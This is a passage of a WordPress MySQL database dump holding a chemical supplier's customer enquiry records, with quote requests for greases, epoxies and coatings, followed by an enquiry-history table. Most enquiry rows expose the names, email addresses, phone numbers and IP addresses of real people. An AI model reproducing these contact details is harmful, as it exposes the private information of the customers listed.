INSERT INTO `wp_enquiry_detail_new` VALUES (1395, 'Marilyn', 'mc@plxinc.com', 'Can I please get a quote on PTFE Release Agent Dry Lubricant MS-122E? Thanks.', '631-586-4190', '', '167.206.204.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 20:36:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1396, 'David Leister', 'dleister@photometrics.com', 'Hello,\n\nCan you advise on minimum order quantity, pricing, and lead time, for MS-460H?\n\nBest wishes,\nDavid Leister', '5205472595', 'MS-460H Price, Lead Time, and MOQ', '64.128.200.134', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:37:"MS-460H | Silicone Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 21:30:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1397, 'Alex', 'alexhdezfly@gmail.com', 'I need the price for this product EPICURE 3282 and for EPON 815c. I live in Miami, USA, Thank', '7865436886', 'Price', '174.48.135.222', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1193";s:5:"title";s:15:"EPIKURE™ 3282";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3282.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 23:46:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1398, 'Steven Avenenti', 'Steven@conformalcoating.tech', 'Please contact me with pricing on product', '6238109005', '', '63.225.192.212', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"732";s:5:"title";s:7:"MS-462H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-462H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-16 00:47:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1399, 'Joseph Reinaldo', 'joseph_reinaldo@metalor.com', 'Greetings,\n\nI\\\'d like a quote on a 1L sample of EPON Resin 828 please.\n\nThank you', '508-226-4470', 'EPON Resin 828', '209.113.160.181', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-16 13:14:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1400, 'Jenny Hua', 'jenny.hua@jpl.nasa.gov', 'Hi,\n\nI would need to order 2 quarts of MS-143TE and expedite. Can you send me a lead time on how quickly this can be sent to me? I\\\'m located at JPL - Pasadena, CA.\n\nLet me know. Thanks.\n\nJenny Hua', '8183546397', 'Lead time', '137.78.4.155', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:35:"MS-143TE | PTFE Mold Release Agents";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-16 16:40:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1401, 'TONY WALSH', 'awalsh@indelac.com', 'Need price and availability for FPG028', '859-727-7890', 'FPG028 PRICING', '66.42.138.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"984";s:5:"title";s:7:"FPG 028";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:96:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-fpg-028-4-e1474477915984.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-16 17:48:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1402, 'Ryan', 'rkyker@parker.com', 'Please quote Chemours Krytox GPL 226. QTY 3 of the 1.76 lb tubes.', '3302961406', 'Chemours Krytox GPL 226 RFQ', '108.171.130.176', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-17 12:24:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1403, 'Alex', 'amatcham@intor.com', 'We are a thin film optics company and are having trouble removing all contaminates from our substrates before coating. What products do you recommend.', '575-835-2200', 'Sion or other cleaning products', '65.158.232.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-17 12:54:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1404, 'Alex ', 'amatcham@intor.com', 'I would like to order a case. Price.... ETA..\nThank you', '5758352200', 'MS-260', '65.158.232.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-17 12:57:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1405, 'Alexis Millan', 'millan@nexprolx.com', 'Dear Seller,\nPlease quote the item Dumpont Krytox GPL 227  20kgs pail\nfor reference and include the estimate shipping charges to Miami Florida 33166-2764\n\nThanks', '3053108807', 'Quote request', '186.185.213.214', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3706";s:5:"title";s:25:"Krytox GPL 207 20 KG Pail";s:5:"price";s:5:"13000";s:5:"quant";s:1:"1";s:3:"img";s:114:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-17 13:58:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1406, 'Halim Chtourou', 'halim.chtourou@fpinnovations.ca', 'Please quote for 1 Gallon.\n\nThanks,\n\nHalim', '514-782-4657', '1 Gallon', '206.167.137.20', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1868";s:5:"title";s:15:"EPIKURE™ 3140";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-17 17:06:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1407, 'Jenny Hua', 'jenny.hua@jpl.nasa.gov', 'Hi can you send me the material safety data sheet for MS-143TE. Thanks!', '', 'Material safety data sheet ', '137.78.4.155', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:35:"MS-143TE | PTFE Mold Release Agents";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-17 18:48:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1408, 'Tony Diaz', 'Diaz50@llnl.gov', 'I would like to order more PTFE spray. I would like two (2) boxes of 9 or 12. I do not recall how many came in a box since it has been a while. If you can get back to me as soon as possible that would be great. Thank you, Tony', '9254220860', 'PTFE spray 13.5oz', '128.115.190.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-17 22:47:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1409, 'Tim Wilmot', 'tim.wilmot@ametek.com', 'Please quote 4 cases of AeroDuster.\n\nThanks,\n\nTim', '7149187105', 'Please quote 4 cases of AeroDuster', '208.87.233.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-18 18:27:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1410, 'Hwan Jo', 'hjo@flowserve.com', 'Does this product (MS-111) remove thermally conductive grease? We are using OB-200  from Omega Engineering. Please follow the link below for the information of grease. \n\nhttp://www.omega.com/pptst/OB-100_OB-200_OT-200.html\n\nThanks, ', '', 'remove thermally conductive grease', '57.97.95.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:30:"MS-111 | Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-18 19:23:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1411, 'Gam Bahadur Gurung', 'gurunggb@kaaabgn.org', 'I have to protect the 220 volt terminal with condensation problem to protect for short circuit. Searching for useful insulation material for such problem to overcome. I saw your product will be useful.\nCould you please send me a quotation for 1 gallon  which need to included the air freight up to Kathmandu, Nepal?\nIf it works properly for my works then we will purchase more in future.\n\nThank you\nI', '', 'Quoation for Protective Varnish MS-452N', '113.199.186.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"622";s:5:"title";s:7:"MS-452N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-452N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-19 17:08:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1412, 'Gam Bahadur Gurung', 'gurunggb@gmail.com', 'Dear sir\nCould you please quote for the 1 gallon of MS -452 N protective varnish which include the air freight up to Kathmandu, Nepal?\nThank you', '9846034963', 'Quotation of MS -452N', '113.199.186.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"622";s:5:"title";s:7:"MS-452N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-452N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-19 17:11:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1413, 'Gam Bahadur Gurung', 'gurunggb@gmail.com', 'Dear sir\n\nCan I use this spry for purpose of  insulation  220 v electrical terminal? Also I would like to get a quotation for 2 nos which include the air freight charge up to Kahtmandu, Nepal\nI look forward your response regarding this quotation.\n\nThank you\n', '9846034963', 'Quotation for MS 470C Urethane Conformal Coating', '113.199.186.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:37:"MS-470C | Urethane Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-19 17:17:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1414, 'Wei', 'jackie321304@hotmail.com', 'Want to know what is the price for the GPL 105. How many lbs will you able to supply and the lead time. Thanks', '', 'Quote for GPL 105', '96.40.153.243', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-21 06:40:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1415, 'Ross Castrianni', 'ross@netcep.com', 'We currently purchase from your company and need pricing on the following:\nDUPONT XHT-ACX GREASE IN 8 OZ. CONTAINER.\nPlease send me you price quote as soon as possible. Thanks. ', '806-453-8900', 'Qoute DUPONT XHT-ACX ', '12.158.150.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"697";s:5:"title";s:7:"XHT-BDX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_105938183.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-21 14:16:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1416, 'Doug Reauso', 'doug.reauso@sensata.com', 'We have an urgent need for 5Kg of 1506 krytox vacuum pump lubricant \nPlease advise price and availability. \nShipping to San Diego/Tijuana', '805-716-0642', '1506 krytox vacuum pump lubricant ', '76.79.164.52', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"943";s:5:"title";s:8:"VPF 1506";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_257574442.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-21 16:32:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1417, 'Doug Frey', 'dfrey@amibearings.com', 'Looking for pricing for 1kg each of KHT-BD, KHT-BDX, and KHT-BDZ.  Also local dealer in Chicago area.  This quantity if for testing, also please advise bulk sizes that would be available.', '2244063692', 'KHT Series ', '50.247.167.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"675";s:5:"title";s:6:"XHT-BD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_361063190.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-21 16:47:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1418, 'LoriAnne Groo', 'lgroo@umich.edu', 'I am interested in trying Epikure Curing Agent W. Would it be possible to try a sample prior to purchasing?', '', 'Sample', '35.2.206.54', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-21 17:49:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1419, 'Fernando Olguin', 'fernando.olguin@kaneka.com', 'Hello, \n\nI would like a quote for a gallon of EPON 828 Epoxy resin. ', '2812914409', 'Quote for Gallon of EPON 828', '128.177.39.49', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-21 18:45:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1420, 'Ken nShultz', 'shultzkp@aol.com', 'I recently purchased a 2005 Corvette with a removable roof. I saw a video and also read some info on the Internet about a product that conditions and protects weatherstripping which surrounds the roof. the product mentioned was called Krytox weatherstrip saver. do you carry this product and if so what price ', '717-858-5350', 'Krytox weatherstrip protector', '174.55.86.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-21 20:09:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1421, 'Xinchun Tian', 'xctian@iastate.edu', 'Can you send me a list of the prices of all sizes of 157 FSL? Thank you!', '5153572667', 'Price inquiry', '129.186.253.180', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-21 23:29:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1422, 'SHVETA GUPTA', 'sales.consumables@divyanshiaviation.com', 'Dear Concerned\n\nplease advise quote for GPL 225, qty 3 kgs.\n\nwe require the same in India and will use FedEx / DHL o ship it. \n\nRegards\nShveta Gupta', '9910997428', 'rfq - GPL 225', '103.5.202.44', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"848";s:5:"title";s:7:"GPL 225";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_159894728.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-22 09:30:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1423, 'Brunson Instrument Company', 'pamelaf@brunson.us', 'I would like to place an order for 2 cases of MS-222N aero duster cans. Our PO will be O105856.Please provide the price at your earliest convenience. ', '816-423-5282', 'PRICE ON MS-222N', '68.171.26.16', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-22 11:26:56', '', NULL, '', '', '', NULL, '', '');
#
# End of data contents of table `wp_enquiry_detail_new`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_enquiry_history`


#
# Delete any existing table `wp_enquiry_history`
#

DROP TABLE IF EXISTS `wp_enquiry_history`;


#
# Table structure of table `wp_enquiry_history`
#

CREATE TABLE `wp_enquiry_history` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `enquiry_id` bigint(12) NOT NULL,
  `date` datetime NOT NULL,
  `message` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `performed_by` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`ID`),
  KEY `enquiry_id` (`enquiry_id`)
) ENGINE=MyISAM AUTO_INCREMENT=1424 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_enquiry_history`
#
 
INSERT INTO `wp_enquiry_history` VALUES (1, 1, '2016-09-27 15:12:09', '-', 'Requested', 3); 
INSERT INTO `wp_enquiry_history` VALUES (2, 2, '2016-09-27 19:13:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (3, 3, '2016-09-27 21:22:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (4, 4, '2016-09-28 02:46:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (5, 5, '2016-09-28 15:24:34', '-', 'Requested', 13); 
INSERT INTO `wp_enquiry_history` VALUES (6, 6, '2016-09-29 02:16:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (7, 7, '2016-09-29 06:35:32', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (8, 8, '2016-09-29 11:26:29', '-', 'Requested', 14); 
INSERT INTO `wp_enquiry_history` VALUES (9, 9, '2016-09-29 12:25:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (10, 10, '2016-09-29 16:46:14', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (11, 11, '2016-09-29 21:30:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (12, 12, '2016-09-29 23:33:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (13, 13, '2016-09-30 08:56:43', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (14, 14, '2016-09-30 10:55:34', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (15, 15, '2016-09-30 11:12:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (16, 16, '2016-09-30 14:46:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (17, 17, '2016-09-30 16:48:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (18, 18, '2016-10-02 20:07:08', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (19, 19, '2016-10-03 14:10:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (20, 20, '2016-10-03 18:47:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (30, 30, '2016-10-04 17:54:12', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (27, 27, '2016-10-04 01:51:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (28, 28, '2016-10-04 12:32:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (29, 29, '2016-10-04 13:36:49', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (31, 31, '2016-10-04 23:32:15', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (32, 32, '2016-10-04 23:47:13', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (33, 33, '2016-10-05 01:12:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (34, 34, '2016-10-05 13:37:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (35, 35, '2016-10-05 14:25:43', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (36, 36, '2016-10-05 16:56:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (37, 37, '2016-10-05 18:01:14', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (38, 38, '2016-10-05 20:20:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (39, 39, '2016-10-06 13:16:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (40, 40, '2016-10-06 18:03:00', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (41, 41, '2016-10-06 18:38:11', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (42, 42, '2016-10-06 19:20:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (43, 43, '2016-10-06 22:39:20', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (44, 44, '2016-10-07 13:05:49', '-', 'Requested', 31); 
INSERT INTO `wp_enquiry_history` VALUES (45, 45, '2016-10-07 13:25:39', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (46, 46, '2016-10-07 19:56:09', '-', 'Requested', 31); 
INSERT INTO `wp_enquiry_history` VALUES (47, 47, '2016-10-08 16:06:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (48, 48, '2016-10-10 18:17:59', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (49, 49, '2016-10-10 22:57:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (50, 50, '2016-10-11 09:59:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (51, 51, '2016-10-11 17:31:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (52, 52, '2016-10-12 04:02:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (53, 53, '2016-10-12 07:11:43', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (54, 54, '2016-10-12 11:25:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (55, 55, '2016-10-12 12:35:13', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (56, 56, '2016-10-12 13:25:58', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (57, 57, '2016-10-12 13:36:02', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (58, 58, '2016-10-12 15:25:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (59, 59, '2016-10-12 15:59:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (60, 60, '2016-10-12 16:22:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (61, 61, '2016-10-13 05:33:13', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (62, 62, '2016-10-13 14:08:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (63, 63, '2016-10-13 14:35:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (64, 64, '2016-10-13 16:35:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (65, 65, '2016-10-13 18:26:16', '-', 'Requested', NULL); 
